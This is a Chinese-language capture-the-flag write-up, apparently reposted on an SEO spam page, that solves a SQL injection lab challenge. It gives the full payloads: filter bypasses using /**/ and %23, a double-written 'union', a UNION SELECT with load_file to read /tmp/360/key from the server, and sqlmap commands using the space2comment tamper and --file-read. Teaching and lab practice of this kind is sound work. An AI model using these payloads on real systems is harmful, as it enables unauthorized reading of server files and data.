当前位置: 首页 > news >正文

中国移动app官方下载宁波seo入门教程

中国移动app官方下载,宁波seo入门教程,wordpress语言包更新,上饶专业做网站建设url:http://192.168.154.253:81/ #打开http://XXX:81/,XXX为靶机的ip地址 审题 1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中 2、开始答题 发现这里url中有一个id的参数&#xff0…

url:http://192.168.154.253:81/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中

2、开始答题

发现这里url中有一个id的参数,并且给出了当前所执行的sql语句

第一步:判断注入点

1、?id=1'

2、?id=1'and'1'='1

第二步:判断语句模板

1、使用 order by 判断语句模板列数

发现语句在执行中过滤了空格还过滤了“#”

执行失败:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

执行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解释:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用来闭合前面的语句,order/**/by/**/3%23(order by 3)用来查询模板列数
  • /**/(用注释的方式代替空格),%23(使用url编码代替#

2、判断出语句模板有4个字段

回显正常:

?id=1')and'1'='1'order/**/by/**/4%23  #执行 order by 4 的时候回显正常

回显不正常:

?id=1')and'1'='1'order/**/by/**/5%23  #执行 order by 5 的时候回显不正常

第三步:找回显点

回显不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 报错找回显点

回显正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于过滤了union,所以这里使用双写的方式经行过滤绕过,并且判断出回显点有3个(语句模板中的234位置均为回显点)

第四步:拿到flag

执行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解释:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #当前数据库名
  • user() #当前数据库用户名
  • load_file('/tmp/360/key') #读取服务器文件

扩展:使用sqlmap一把梭哈

1、由于前面判断出了此题注入点存在过滤空格的情况,所以在使用sqlmap的时候需要指定脚本(用注释/**/替换空格字符' ':--tamper "space2comment.py")运行

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  

2、获取到flag

http://www.tj-hxxt.cn/news/124797.html

相关文章:

  • dede网站地图不显示文章列表搜索引擎技术包括哪些
  • 德清网站建设中心seo排名怎样
  • 成都建设规划网站发布推广信息的网站
  • 郑州网站建设多少钱seo的方式包括
  • 河南省住房城乡与建设厅网站首页营销系统
  • 如何用word做网站关键词名词解释
  • 网站营销外包公司大数据培训机构排名前十
  • 找建筑官网李江seo
  • 购物商城网站建设服务营销
  • 郑州网站建设费用郑州专业seo推荐
  • 广东广东网站建设工作我想做网络推广
  • wordpress主题dux3.0昆明排名优化
  • 杭州网站建设电话网络广告设计
  • 做静态网站有什么用实时热点新闻
  • 营销型网站建设评价一键优化免费下载
  • 电商网站html模板新东方线下培训机构官网
  • 网站优化改版怎么接广告赚钱
  • 物流网站建设公司2023新闻大事件摘抄
  • 怎样优化网站自然排名简述搜索引擎优化
  • 浅析动态网站建设之后台数据库的选择关键词搜索推广
  • 做网站的策划书手机制作网页用什么软件
  • 字体+添加+wordpress宁波seo搜索排名优化
  • 商务网站建设管理思路百度搜索链接
  • 做网站和推广工资多少钱小红书推广引流
  • 装饰公司营销型网站建设长沙网络推广营销
  • 做外国美食的视频网站河南郑州做网站的公司
  • 域名注册,网站建设,好做吗站长统计app最新版本2023
  • 担路网提供网站建设代推广app下载
  • .net手机网站源码百度推广账号
  • wordpress西部数码接口seo产品是什么意思